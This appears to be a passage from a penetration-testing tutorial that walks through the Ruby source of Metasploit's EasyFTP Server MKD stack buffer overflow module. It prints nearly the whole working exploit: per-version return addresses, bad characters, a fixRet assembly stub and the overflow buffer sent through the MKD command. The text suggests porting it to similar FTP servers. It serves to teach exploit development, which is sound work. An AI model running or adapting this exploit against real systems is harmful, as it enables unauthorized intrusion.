Developing an exploit is one of the most interesting aspects of the Metasploit framework. In this section, we will briefly discuss the core issues surrounding the development of an exploit, and explain its key skeleton by taking a live example from the existing framework's database. However, it is important to be adept with the Ruby programming language before you attempt to write your own exploit module. On the other hand, intermediate skills of reverse-engineering and a practical understanding of vulnerability-discovery tools (for example, fuzzers and debuggers) provide an open map toward the exploit construction. This section is meant only as an introduction to the topic, not a complete guide.
For our example, we have selected the exploit (EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow), which will provide a basic view of exploiting a buffer-overflow vulnerability in the Easy FTP Server application. You can port this module for a similar vulnerability found in other FTP server applications and so utilize your time effectively. The exploit code is located at /usr/share/metasploit-framework/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb:
## # $Id: easyftp_mkd_fixret.rb 9935 2010-07-27 02:25:15Z jduck $ ##
The preceding code is a basic header representing a file name, a revision number, and the date and time values of an exploit:
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core'
The MSF core library requires an initialization at the beginning of an exploit:
class Metasploit3 <Msf::Exploit::Remote
In the preceding code, the Exploitmixin/ class is the one that provides various options and methods for the remote TCP connections, such as RHOST, RPORT, Connect(), Disconnect(), and SSL(). The following code is the rank level assigned to the exploit on the basis of its frequent demand and usage:
Rank = GreatRanking
In the following code, the Ftp mixin/ class establishes a connection with the FTP server:
includeMsf::Exploit::Remote::Ftp
The following code provides generic information about the exploit and points to known references:
def initialize(info = {}) super(update_info(info, 'Name' => 'EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which leads to a stack based buffer overflow. NOTE: EasyFTP allows anonymous access by default. However, in order to access the 'MKD' command, you must have access to an account that can create directories. After version 1.7.0.12, this package was renamed "UplusFtp". This exploit utilizes a small piece of code that I've referred to as 'fixRet'. This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by 'fixing' the return address post-exploitation. See references for more information. }, 'Author' => [ 'x90c', # original version 'jduck' # port to metasploit / modified to use fix-up stub (works with bigger payloads) ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9935 $', 'References' => [ [ 'OSVDB', '62134' ], [ 'URL', 'http://www.exploit-db.com/exploits/12044/' ], [ 'URL', 'http://www.exploit-db.com/exploits/14399/' ] ],
The following code instructs the payload to clean up itself once the execution process is completed:
'DefaultOptions' => { 'EXITFUNC' => 'thread'
The following code snippet defines 512 bytes of space available for the shellcode, lists bad characters that should terminate our payload delivery, and disables the NOP-padding:
}, 'Privileged' => false, 'Payload' => { 'Space' => 512, 'BadChars' => "x00x0ax0dx2fx5c", 'DisableNops' => true },
The following code snippet provides instructions on what platform is being targeted and defines the vulnerable targets (0 to 9) that list the different versions of the Easy FTP Server (1.7.0.2 to 1.7.0.11), each representing a unique return address based on the application binary (ftpbasicsvr.exe). Furthermore, the exploit disclosure date was added, and the default target was set to 0 (v1.7.0.2):
'Platform' => 'win', 'Targets' => [ [ 'Windows Universal - v1.7.0.2', { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.3', { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.4', { 'Ret' => 0x004041dc } ], # call ebp - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.5', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.6', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.7', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.8', { 'Ret' => 0x00404481 } ], # call ebp - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.9', { 'Ret' => 0x00404441 } ], # call ebp - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.10', { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe [ 'Windows Universal - v1.7.0.11', { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe ], 'DisclosureDate' => 'Apr 04 2010', 'DefaultTarget' => 0))
In the following code, the check() function determines whether the target is vulnerable:
end def check connect disconnect if (banner =~ /BigFoolCat/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end
The following code defines a function that generates NOP sleds to aid with IDS/IPS/AV evasion. Some consider NOP sleds to be a quick and dirty solution to this problem and believe that they should not be used unless there is a particularly good reason. For simplicity, during this example of writing a module, we have left the function in the code:
defmake_nops(num); "C" * num; end
The following procedure fixes a return address from where the payload can be executed. Technically, it resolves the issue of stack-addressing:
def exploit connect_login # NOTE: # This exploit jumps to ebp, which happens to point at a partial version of # the 'buf' string in memory. The fixRet below fixes up the code stored on the # stack and then jumps there to execute the payload. The value inesp is used # with an offset for the fixup. fixRet_asm = %q{ movedi,esp subedi, 0xfffffe10 mov [edi], 0xfeedfed5 addedi, 0xffffff14 jmpedi } fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string buf = ''
Initially, the exploit buffer holds the encoded return address and the randomized NOP instructions:
print_status("Prepending fixRet...") buf<<fixRet buf<<make_nops(0x20 - buf.length)
The following code adds a dynamically-generated shellcode to our exploit at runtime:
print_status("Adding the payload...") buf<<payload.encoded
The following code fixes the stack data and makes a short jump over the return address holding our shellcode buffer:
# Patch the original stack data into the fixer stub buf[10, 4] = buf[268, 4] print_status("Overwriting part of the payload with target address...") buf[268,4] = [target.ret].pack('V') # put return address @ 268 bytes
At the end, using the preceding code, we send our finalized buffer to the specific target using the vulnerable MKD FTP post-authentication command. Since the MKD command in the Easy FTP Server is vulnerable to stack-based buffer-overflow, the buf command will overflow the target stack and exploit the target system by executing our payload:
print_status("Sending exploit buffer...") send_cmd( ['MKD', buf] , false)
Close your connections using the following code:
handler disconnect end end
Metasploit is equipped with useful tools, such as msfpescan for Win32 and msfelfscan for Linux systems, that may assist you in finding a target-specific return address. For instance, to find a sustainable return address from your chosen application file, type # msfpescan -p targetapp.ext.